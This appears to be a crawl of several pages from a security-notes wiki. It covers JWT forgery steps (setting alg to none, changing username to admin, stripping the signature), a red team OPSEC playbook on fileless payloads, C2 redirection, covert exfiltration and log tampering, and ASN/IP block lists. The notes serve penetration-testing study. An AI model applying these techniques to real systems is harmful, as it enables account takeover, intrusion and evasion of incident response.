documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec/json.md) . **Manipulating JWTs** 1. Paste the token into jwt.io 2. Replace the "alg" value with "none" in header. (try the alg header variations such as "none", "None", "nOnE", "NONE".) 3. Replace arbitrary values of the payload e.g. "username" with "admin". 4. Empty the signature field If the error "Invalid Signature" occured, we can manually create Base64 value for each section (remove the "=" symbol). If you want to empty the signature field manually, you can delete the final section. 1. Now copy the JWT. 2. Go to the website and replace the original JWT with the new one in HTTP header. **Changing Expiration** During JWT testing, you should try to modify the "exp" value: `"exp": 1679156071 -> 991679156071` **JQ Queries** Command Description `cat vulnapp.json | jq '.Servers[]'` Retrieve the top level object (Servers array element) `cat vulnapp.json | jq '.Servers[].Instances'` Access an object within an array using dot notation `cat vulnapp.json | jq '.Servers[].Instances[]ServerType'` Access an individual object deeper within an array Quietly download a list of ip ranges, use jq tp parse through the file, sort the data, and output the results to a text file Copy wget -qO https://ip-ranges.cloudvendor.com/ip-ranges.json | jq '.prefxes[] | if .region == "country-region-1" then ip_prefixes else empty end' -r | sort -u > country-region-range.txt [PreviousCommand Injection Testing](https://martian1337.gitbook.io/notes/notes/appsec/command-injection-testing) [NextSecurity Research](https://martian1337.gitbook.io/notes/notes/security-research) Last updated 1 year ago --- # Product Security Engineering | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering.md) . [DevSecOps](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops) [SAST/SCA](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca) [Product Security Hardening](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening) [Threat Modeling](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling) [PHP Security](https://martian1337.gitbook.io/notes/notes/product-security-engineering/php-security) [Product Security Governance](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance) [PreviousAI](https://martian1337.gitbook.io/notes/resources/ai-and-ml) [NextDevSecOps](https://martian1337.gitbook.io/notes/notes/product-security-engineering/devsecops) Last updated 1 year ago --- # Programming | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/resources/coding.md) . #### [](https://martian1337.gitbook.io/notes/resources/coding#web) Web Web Language Docs Online Web Coding Environments Guides Web [SOAP](https://www.w3schools.com/XML/xml_soap.asp) (XML) [GraphQL](https://graphql.org/) [HTML](https://www.w3schools.com/html/default.asp) [CSS](https://www.w3schools.com/Css/) [JavaScript](https://www.w3schools.com/js/DEFAULT.asp) [Web.Dev (Web Language Learning)](https://web.dev/learn/) ! [Front-end Checklist](https://frontendchecklist.io/) [Devhints](https://devhints.io/) ! Web Languages Practice [Codepen](https://codepen.io/) - build, test, and discover front-end code [The Odin Project](https://www.theodinproject.com/) - full-stack curriculum (free) [Codeply](https://www.codeply.com/) - HTML/CSS/JS editor with frameworks and templates [JavaScript for Pentesters (PTA Walkthrough)](https://sp1icer.dev/writeups/javascript-for-pentesters-intro/) [JavaScript for Pentesters Part 2](https://sp1icer.dev/writeups/javascript-for-pentesters-pt-2/) [Full Stack Open](https://fullstackopen.com/en/) - Javascript Training [](https://martian1337.gitbook.io/notes/resources/coding#system-coding) System Coding ------------------------------------------------------------------------------------------ General Docs Linux/Shellcode Tools/Helpers Challenges [Interactive language learning Repo from @ronreiter](https://github.com/ronreiter/interactive-tutorials) [Roadmap.sh](https://roadmap.sh/roadmaps) - Collection of free language learning resources by developer job role ! [LearnXinYminutes](https://learnxinyminutes.com/) \- Language Learning Site [DevDocs](https://devdocs.io/) - searchable library of various common API documentation [Python Tutorial](https://www.pythontutorial.net/) [Free Programming Books](https://github.com/EbookFoundation/free-programming-books) Scripting/Programming Docs [Python](https://wiki.python.org/moin/BeginnersGuide) ! [C](https://www.learn-c.org/) [Go](https://www.go.dev/) [Rust](https://www.rust-lang.org/) [FOSS Linux](https://www.fosslinux.com/) [Linuxize](https://linuxize.com/) [It's FOSS](https://itsfoss.com/) [LinuxOPsys](https://linuxopsys.com/) [Linux Hint](https://linuxhint.com/) [Linux Command](https://linuxcommand.org/) [Linux Handbook](https://linuxhandbook.com/) [Linux Journey](https://linuxjourney.com/) [Linux Survival](https://linuxsurvival.com/) [Tecmint](https://www.tecmint.com/) Coding References [Visual Studio Download](https://visualstudio.microsoft.com/downloads/) (VS) [Snyk Vulnerability Scanner](https://docs.snyk.io/ide-tools/visual-studio-code-extension) - extension that does analysis while using VS Code [AWS CodeWhisperer](https://docs.aws.amazon.com/toolkit-for-vscode/latest/userguide/codewhisperer.html) - ML-powered code suggestion VS extension [Live Preview](https://marketplace.visualstudio.com/items?itemName=ms-vscode.live-server) - VS extension that shows web projects while coding [Devhints](https://devhints.io/) - Code Samples/cheatsheets ! [HackerEarth](https://www.hackerearth.com/) [Hackerrank](https://www.hackerrank.com/) [CodeChef](https://www.codechef.com/) [TopCoder](https://www.topcoder.com/) [Exercism](https://exercism.io/) [Codewars](https://www.codewars.com/) [LeetCode](https://leetcode.com/) [Sphere Online Judge](http://www.spoj.com/) [CodinGame](https://www.codingame.com/) [ROP emporium](https://ropemporium.com/) (ROP challenges) [CheckIO Python/TypeScript Challenges](https://py.checkio.org/) [PreviousCybersecurity Operating Systems](https://martian1337.gitbook.io/notes/resources/general-cybersecurity/cybersecurity-operating-systems) [NextReverse Engineering](https://martian1337.gitbook.io/notes/resources/reverse-engineering) Last updated 6 months ago --- # Product Security Governance | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance.md) . ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance#software-security-flow-down) Software Security Flow Down **Phase** **Description** **Supporting Document(s)** **Security Flow-Down Considerations** **Requirements Specification** Defines in a complete, precise, and verifiable manner the requirements, design, behavior, or other expected characteristics of a system, service, or process. Draft Statement of Work (SoW), Draft Requirements Description Document (RDD) Capture explicit security requirements (e.g., authentication, data protection, compliance, logging). **Analysis** Examination of acquired data for its significance and probative value to the case. SoW, Requirements Description Document (RDD), Draft Software Requirements Specification (SRS) Validate security requirements against threat models, compliance standards, and risk assessments. **Design** Process to define the architecture, system elements, interfaces, and other characteristics of a system or system element. Software Requirements Specification (SRS), Draft Software Design Document (SDD), Draft Software Development Plan (SDP) Incorporate security architecture (secure data flows, access control, boundary protections, encryption strategy). **Implementation** Specific requirements or instructions for implementing software. Draft Software Test Plan (STP), Software Design Document (SDD), Software Development Plan (SDP) Apply secure coding standards, enforce code reviews, automate security scanning (SAST/DAST), protect dependencies. **Test** Determination of one or more characteristics of an object of conformity assessment, according to a procedure. Software Test Plan (STP) Perform penetration testing, vulnerability scanning, fuzz testing, and validate misuse cases. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance#notes) Notes * Each **phase builds on the previous one**: Requirements → Analysis → Design → Implementation → Testing. * The **Software Security Strategy flows down** across all phases, ensuring traceability and consistent enforcement. * Supporting documents should be version-controlled within the repository for auditability and compliance. * * * [PreviousPHP Security](https://martian1337.gitbook.io/notes/notes/product-security-engineering/php-security) [NextControversial Subjects](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance/controversial-subjects) Last updated 10 months ago * [Software Security Flow Down](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance#software-security-flow-down) * [Notes](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance#notes) --- # Controversial Subjects | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance/controversial-subjects.md) . [Redis License Compliance in 2025](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance/controversial-subjects/redis-license-compliance-in-2025) [PreviousProduct Security Governance](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance) [NextRedis License Compliance in 2025](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance/controversial-subjects/redis-license-compliance-in-2025) --- # CTF Sites | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/platforms/ctf-sites.md) . [HackTheBox](https://www.ctf.hackthebox.com/) ! [RingZer0ctf](https://ringzer0ctf.com/) [Backdoor](https://backdoor.sdslabs.co/) [cmdchallenge](https://cmdchallenge.com/) [hpandro1337](http://ctf.hpandro.raviramesh.info/) Android CTF [PWN Challenge](http://pwn.eonew.cn/) - Binary Exploitation [PWN Adventure](http://pwnadventure.com/) - Vulnerable MMORPG [SmashTheStack](http://www.smashthestack.org/) - Binary Exploitation [Microcorruption](https://microcorruption.com/login) - Debug Assembly programs [crackmes](https://crackmes.one/) - Reverse engineering [webhacking.kr](https://webhacking.kr/) - Web exploitation [LordofSQLi](https://los.rubiya.kr/) - SQLinjection challenges [DefendTheWeb](https://defendtheweb.net/) - Web exploitation [XSS Game](http://www.xssgame.com/) [cryptohack](https://cryptohack.org/) [cryptopals](https://cryptopals.com/) [id0-rsa](https://id0-rsa.pub/) - Crypto challenges [TryToDecrypt](https://www.trytodecrypt.com/index.php) [echoCTF](https://echoctf.red/) [exploit.education](https://exploit.education/) [HBH](https://hbh.sh/home) Jeopardy-style CTF platform [MOD-X](http://www.mod-x.co.uk/main.php%22) - Jeopardy-style CTF platform [PWN.TN](https://pwn.tn/) [Prompt Riddle](https://promptriddle.com/) - Prompt-based CTF [Hacker Gateway](https://www.hackergateway.com/) [PWNX](https://pwnx.io/) [UnderTheWire](https://underthewire.tech/) - Powershell challenges [SuNiNaTaS](http://suninatas.com/) [PreviousDefensive Security](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security) [NextLive Vulnerable Sites](https://martian1337.gitbook.io/notes/training-and-career/platforms/live-vulnerable-sites) Last updated 1 year ago --- # Entrepreneurship Roadmaps | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps.md) . [Consulting](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting) [Starting a Business](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/starting-a-business) [PreviousAndroid OSes](https://martian1337.gitbook.io/notes/digital-privacy/android-oses) [NextConsulting](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps/consulting) Last updated 1 year ago --- # Android OSes | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/android-oses.md) . #### [](https://martian1337.gitbook.io/notes/digital-privacy/android-oses#recommended) Recommended Recent changes in Google’s handling of AOSP have significantly impacted the ability of projects like GrapheneOS to maintain secure, private, sandboxed profiles and hardware support. Here's a summary of how this affects GrapheneOS versus non-AOSP-based OSes like Sailfish OS, PureOS, postmarketOS, and Ubuntu Touch: PureOS, postmarketOS, Sailfish OS, and Ubuntu Touch are indeed not based on Google's Android Open Source Project (AOSP) in the typical sense used by mainstream Android devices, and therefore they are not directly subject to Google's policies and politics that affect AOSP-based systems. * PureOS is a Debian GNU/Linux derivative focused on privacy and freedom that does not use Android drivers or applications and is not compatible with Android or Windows smartphones without significant adaptation efforts. It's targeted mainly at Librem hardware and similar Linux-compatible devices, not typical Android phones, and manages its own kernel and software stack independent of AOSP. * Sailfish OS is a separate Linux-based mobile OS built around a different architecture and user interface, not based on AOSP, and focusing on privacy and control. It can run on certain devices and emphasize de-Googled experiences. * Ubuntu Touch is based on the Ubuntu Linux distribution but uses the Android Linux kernel and drivers where necessary for hardware compatibility. However, it does not use the Java-like Android framework or Google services, distinguishing it technically and politically from AOSP-based OSes controlled by Google. It uses containers to isolate such dependencies, avoiding direct reliance on Google’s ecosystem. * postmarketOS is another fully Linux-based OS designed for mobile devices usually supporting mainline Linux kernels and focusing on device longevity and openness, rather than any Android or AOSP codebase. It aims to work on many legacy devices but does not rely on AOSP or its ecosystem. In summary, these operating systems operate outside of Google's direct influence and are not bound by the politics and restrictions Google imposes on the AOSP and Google Mobile Services ecosystem. They enable more control, privacy, and independence from Google’s Android ecosystem while potentially sacrificing compatibility with many Android apps or Google services. ### [](https://martian1337.gitbook.io/notes/digital-privacy/android-oses#how-the-non-aosp-based-oses-compare) How the Non-AOSP-Based OSes Compare * **Sailfish OS**: Offers app sandboxing through Sailjail profiles, isolating app data and permissions at install time. This feature is similar to GrapheneOS but implemented independently from AOSP. Because Sailfish is not based on AOSP or Pixel-specific drivers, it is unaffected by the recent Google policy changes. * **PureOS & postmarketOS**: These use standard Linux permission models and rely on mainline Linux kernels, not Android device trees or drivers. They do not offer GrapheneOS-style user profiles and sandboxes, but their development and support are insulated from Google’s political or technical decisions regarding Android/AOSP. * **Ubuntu Touch**: Does not offer advanced sandboxed profiles for apps or users. It may use some Android drivers for legacy hardware, but this is handled using Linux containers and is not impacted by AOSP policy changes. Its app isolation does not match GrapheneOS or Sailfish and remains traditional. ### [](https://martian1337.gitbook.io/notes/digital-privacy/android-oses#comparison-table) Comparison Table OS Sandboxed Profiles Impacted by AOSP Changes Notes GrapheneOS Yes Yes Strongest sandboxing, struggling with hardware support due to Google Sailfish OS Yes (Sailjail) No Sandboxing based on Linux, not AOSP PureOS No (standard Linux) No Mainline Linux model, unaffected postmarketOS No (standard Linux) No Mainline Linux model, unaffected Ubuntu Touch No No No advanced sandboxing; traditional model Sailfish OS remains the closest alternative to GrapheneOS in terms of sandboxed profiles, but without AOSP dependencies, while other Linux-based OSes do not offer similar sandboxing and are likewise immune to Google's shifting AOSP politics. #### [](https://martian1337.gitbook.io/notes/digital-privacy/android-oses#why-not-google-aosp) Why not Google AOSP? The recent changes Google made to AOSP impacted projects like GrapheneOS and CalyxOS because Google stopped publishing device trees and kernel sources for new Pixel devices, which are critical for developing and maintaining custom ROMs on those devices. GrapheneOS has managed to update to Android 16 and continues to provide support for existing Pixel devices, including Pixel 8a and potentially Pixel 9 series. The development for Android 16 is underway despite the challenges, though it is expected to be harder going forward due to Google’s reduced openness. The Pixel versions currently not affected in terms of GrapheneOS support are the Pixel 8a and Pixel 10, which had their kernel sources released on launch day. Future Pixel devices, starting with newer ones beyond Pixel 10, may face serious support difficulties unless Google reverses its policy or partners manufacture devices specifically for GrapheneOS. * GrapheneOS stable releases are available up to Android 16 on Pixel 8a and Pixel 10. * These versions are the last known to have full kernel and device tree access. * Google's changes mainly affect future Pixels beyond these models, complicating custom ROM support. * CalyxOS faces similar challenges due to these changes [PreviousMonero Mining Guide](https://martian1337.gitbook.io/notes/digital-privacy/monero-mining-guide) [NextEntrepreneurship Roadmaps](https://martian1337.gitbook.io/notes/cyber-entreprenuership/entrepreneurship-roadmaps) Last updated 8 months ago * [How the Non-AOSP-Based OSes Compare](https://martian1337.gitbook.io/notes/digital-privacy/android-oses#how-the-non-aosp-based-oses-compare) * [Comparison Table](https://martian1337.gitbook.io/notes/digital-privacy/android-oses#comparison-table) --- # Red Teaming | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/offensive-security.md) . [Red Team Infrastructure](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure) [Red Team OPSEC Playbook](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook) [PreviousCloud Security Testing](https://martian1337.gitbook.io/notes/notes/cloud-security-testing) [NextRed Team Infrastructure](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure) --- # AppSec Testing | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec.md) . [Checklists](https://martian1337.gitbook.io/notes/notes/appsec/checklists) [Targeted Test Cases](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases) [Ports and associated Vectors](https://martian1337.gitbook.io/notes/notes/appsec/ports-and-associated-vectors) [DNS](https://martian1337.gitbook.io/notes/notes/appsec/dns) [Web Tools](https://martian1337.gitbook.io/notes/notes/appsec/tools) [Command Injection Testing](https://martian1337.gitbook.io/notes/notes/appsec/command-injection-testing) [JWTs and JSON](https://martian1337.gitbook.io/notes/notes/appsec/json) [PreviousRedis License Compliance in 2025](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance/controversial-subjects/redis-license-compliance-in-2025) [NextChecklists](https://martian1337.gitbook.io/notes/notes/appsec/checklists) Last updated 1 year ago --- # Red Team OPSEC Playbook | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook.md) . ### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-1.-planning-and-reconnaissance) 1\. Planning and Reconnaissance * **Objectives:** Define scope and rules; conduct thorough, OPSEC-aware passive reconnaissance to gather intelligence without detection; risk assessment. * **Detailed Steps:** * Identify critical information to protect (personas, infrastructure, intentions). * Passive and low-noise footprint OSINT gathering. * Use compartmentalized and anonymized infrastructure (VPNs, cloud instances). * Securely document and communicate findings. * **Tools/Resources:** * [Amass](https://github.com/OWASP/Amass) — attack surface mapping * [Recon-ng](https://github.com/lanmaster53/recon-ng) — OSINT reconnaissance * [Maltego](https://www.maltego.com/) — link analysis * [Shodan](https://www.shodan.io/) — asset discovery * [LinkedInt](https://linkdedin.xyz/) — LinkedIn scraping * [Gitleaks](https://github.com/gitleaks/gitleaks) — secrets detection * **Advanced Considerations:** Use AI-assisted reconnaissance tools for hyper-automation, ensuring slow and randomized scans to avoid detection. * * * ### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-2.-initial-access-and-execution) 2\. Initial Access and Execution * **Objectives:** Gain initial entry with stealth, use adaptive, fileless payloads; maintain encrypted, anonymized communication. * **Detailed Steps:** * Develop or customize environment-aware, fileless payloads for each target. * Test extensively in isolated OPSEC-hardened labs mimicking targets. * Use “living off the land” techniques to minimize forensic trails. * Employ multiple C2 redirects/proxy chains with dynamic infrastructure. * Encrypt and jitter beacons in C2 communication to avoid baseline anomalies. * **Tools/Resources:** * [Cobalt Strike](https://www.cobaltstrike.com/) — commercial C2 and payload ops * [Outflank Security Tooling (OST)](https://www.outflank.nl/products/outflank-security-tooling/) — evasion and OPSEC booster for Cobalt Strike * [Metasploit Framework](https://www.metasploit.com/) — exploit/payload platform * [PowerShell Empire](https://github.com/PowerShellEmpire/Empire) — post-exploitation framework * [Beacon Object Files (BOFs)](https://outflank.com/beacon-object-files-bofs/) — stealth payload extensions * **Advanced Considerations:** Use AI-generated payload mutations to evade signature-based detections and dynamic environment checks to disable execution in sandboxes. * * * ### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-3.-persistence-and-lateral-movement) 3\. Persistence and Lateral Movement * **Objectives:** Establish stealthy persistence; conduct low-noise lateral movement; limit credential exposure. * **Detailed Steps:** * Use short-lived, compartmentalized credentials. * Employ OPSEC-conscious AD attack paths and lateral movement avoiding noisy scanning. * Persist via userland methods (scheduled tasks, COM hijacks), cleaned after use. * Rotate attack infrastructure and IPs to prevent forensic correlation. * **Tools/Resources:** * [BloodHound](https://github.com/BloodHoundAD/BloodHound) — AD attack visualization * [Mimikatz](https://github.com/gentilkiwi/mimikatz) — credential dump/manipulation * [Impacket](https://github.com/SecureAuthCorp/impacket) — Python network lib for SMB/Windows protocol * Kerberos OPSEC plugin techniques: [F-Secure blog](https://labs.f-secure.com/blog/the-offensive-kerberos-world/) * **Advanced Considerations:** Continuously monitor defensive telemetry (if accessible), adapt tactics, and employ automated kill switches on sandbox detection. * * * ### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-4.-data-collection-and-exfiltration) 4\. Data Collection and Exfiltration * **Objectives:** Collect and exfiltrate target data securely with minimal noise using covert, multi-layer encryption and multiple channels. * **Detailed Steps:** * Encrypt data locally before exfiltration. * Chunk data and use multi-protocol covert channels (DNS, HTTPS, ICMP). * Rotate exfiltration domains, IP infrastructure, and credentials often. * Stage exfil on cloud services using ephemeral credentials and camouflage among normal traffic. * **Tools/Resources:** * [DNSCat2](https://github.com/iagox86/dnscat2) — DNS-tunneling tool * [Chisel](https://github.com/jpillora/chisel) — SSH tunneling over HTTP(S) * [Cloud storage abuse methods](https://unit42.paloaltonetworks.com/cloud-threats-and-data-exfiltration/) — guide from Unit42 * Custom AWS/Azure CLI scripts for cloud staging automation * **Advanced Considerations:** Automate exfiltration scheduling to coincide with legitimate high-volume traffic, mimicking normal user patterns. * * * ### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-5.-cleanup-and-cover-tracks) 5\. Cleanup and Cover Tracks * **Objectives:** Erase forensic footprints and undo persistence without disrupting normal operations. * **Detailed Steps:** * Wipe memory artifacts and unlink rogue processes. * Delete logs or selectively edit event entries. * Remove all persistence mechanisms, disable accounts, revoke credentials. * Conduct detailed post-op analysis identifying OPSEC failures. * **Tools/Resources:** * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) — cleanup and log manipulation * Custom memory wiping and log cleaner scripts (PowerShell, OS-native) * [Awesome Red Team OPSEC Cheatsheet](https://github.com/RistBS/Awesome-RedTeam-Cheatsheet/blob/master/Miscs/OPSEC%20Guide.md) * **Advanced Considerations:** Integrate automation of cleanup immediately on operation exit, leveraging volatile storage and scheduled tasks. * * * ### [](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-6.-cross-phase-operational-best-practices) 6\. Cross-Phase Operational Best Practices * **Description:** Maintain strong OPSEC hygiene across people, infrastructure, and communications. * **Key Practices:** * Strict role compartmentalization of operators and infrastructure. * Automated rotation of IP addresses, domains, digital certificates with cloud APIs. * Use metadata-minimizing encrypted comms like [Signal](https://signal.org/) , [Session](https://getsession.org/) , or Tor-based messaging. * Behavioral hygiene: avoid repetitive patterns and operational timing fingerprinting. * Ongoing OPSEC risk assessments during operations. * **Training and Methodology Resources:** * [SpecterOps Red Team Operations](https://specterops.io/training/red-team-operations/) * [TryHackMe Red Team OPSEC Guide](https://github.com/jesusgavancho/TryHackMe_and_HackTheBox/blob/master/Red%20Team%20OPSEC.md) * [RedTeam-Tools GitHub Repository](https://github.com/A-poc/RedTeam-Tools) [PreviousRed Team Infrastructure](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-infrastructure) [NextIncident Response](https://martian1337.gitbook.io/notes/notes/defensive-security) Last updated 6 months ago * [1\. Planning and Reconnaissance](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-1.-planning-and-reconnaissance) * [2\. Initial Access and Execution](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-2.-initial-access-and-execution) * [3\. Persistence and Lateral Movement](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-3.-persistence-and-lateral-movement) * [4\. Data Collection and Exfiltration](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-4.-data-collection-and-exfiltration) * [5\. Cleanup and Cover Tracks](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-5.-cleanup-and-cover-tracks) * [6\. Cross-Phase Operational Best Practices](https://martian1337.gitbook.io/notes/notes/offensive-security/red-team-opsec-playbook#id-6.-cross-phase-operational-best-practices) --- # Targeted Test Cases | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases.md) . [Part 1](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/targeted-test-cases) [Part 2](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/part-2) [PreviousSecure Code Review Checklist](https://martian1337.gitbook.io/notes/notes/appsec/checklists/secure-code-review-checklist) [NextPart 1](https://martian1337.gitbook.io/notes/notes/appsec/targeted-test-cases/targeted-test-cases) Last updated 1 year ago --- # Python | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/coding-programming/python.md) . [Quick Notes](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes) [Python Basics for Pentesters](https://martian1337.gitbook.io/notes/notes/coding-programming/python/python-basics-for-pentesters) [Python Snippets](https://martian1337.gitbook.io/notes/notes/coding-programming/python/python) [XML Basics with Python](https://martian1337.gitbook.io/notes/notes/coding-programming/python/xml-basics-with-python) [PreviousJavaScript](https://martian1337.gitbook.io/notes/notes/coding-programming/javascript) [NextQuick Notes](https://martian1337.gitbook.io/notes/notes/coding-programming/python/quick-notes) Last updated 1 year ago --- # Product Security Hardening | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening.md) . [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#unrelated-networks-to-block) Unrelated Networks to block ------------------------------------------------------------------------------------------------------------------------------------------------------------------- These networks scan the internet and are not exactly a threat but due to the scanning, it reveals vulnerability information within the infrastructure. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#blocking-internet-measurement-driftnet) Blocking Internet Measurement (DriftNet) ASN211298 **IPv4 Scanning IPs** Copy 87.236.176.0/24 193.163.125.0/24 68.183.53.77/32 104.248.203.191/32 104.248.204.195/32 142.93.191.98/32 157.245.216.203/32 165.22.39.64/32 167.99.209.184/32 188.166.26.88/32 206.189.7.178/32 209.97.152.248/32 **IPv6 IPs** You may also opt out by sending your IP ranges and/or domain names to [optout@driftnet.io](mailto:optout@driftnet.io) . This process will be validated for confirmation by the Driftnet team. ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-censys) Block Censys AS398705 AS398324 AS398722 ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-ionos) Block IONOS AS8560 ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-internet-archive-wayback-machine) Block Internet Archive (Wayback Machine) AS7941 ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-north-korea) Block North Korea AS13127 ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-yandex-russian-search-engine) Block Yandex (Russian Search Engine) AS13238 ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-m247-europe) Block M247 Europe AS9009 ### [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-protonvpn) Block ProtonVPN AS209103 Block Cortex Xpanse [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fdocs-cortex.paloaltonetworks.com%2Ffavicon.ico&width=20&dpr=3&quality=100&sign=f9d019cc&sv=2)Palo Alto Networks documentation portaldocs-cortex.paloaltonetworks.com](https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity) [](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#cloudflare) Cloudflare --------------------------------------------------------------------------------------------------------------------------------- **GeoBlocking with Whitelist expression** - This rule blocks incoming traffic from a specified list of countries and the Tor network while allowing traffic from any IP addresses included in a predefined whitelist (e.g., trusted clients or partners). Bulk IP CSV uploads require a CSV in `IP, Description`Format. Here is a python script to use for creating the bulk upload csv: **cfbulkip.py** [PreviousCodeQL for Beginners](https://martian1337.gitbook.io/notes/notes/product-security-engineering/sast-sca/codeql-for-beginners) [NextThreat Modeling](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling) Last updated 9 months ago * [Unrelated Networks to block](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#unrelated-networks-to-block) * [Blocking Internet Measurement (DriftNet)](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#blocking-internet-measurement-driftnet) * [Block Censys](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-censys) * [Block IONOS](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-ionos) * [Block Internet Archive (Wayback Machine)](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-internet-archive-wayback-machine) * [Block North Korea](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-north-korea) * [Block Yandex (Russian Search Engine)](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-yandex-russian-search-engine) * [Block M247 Europe](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-m247-europe) * [Block ProtonVPN](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#block-protonvpn) * [Cloudflare](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-hardening#cloudflare) Copy 2a06:4880::/32 2604:a880:800:10::c4b:f000/124 2604:a880:800:10::c51:a000/124 2604:a880:800:10::c52:d000/124 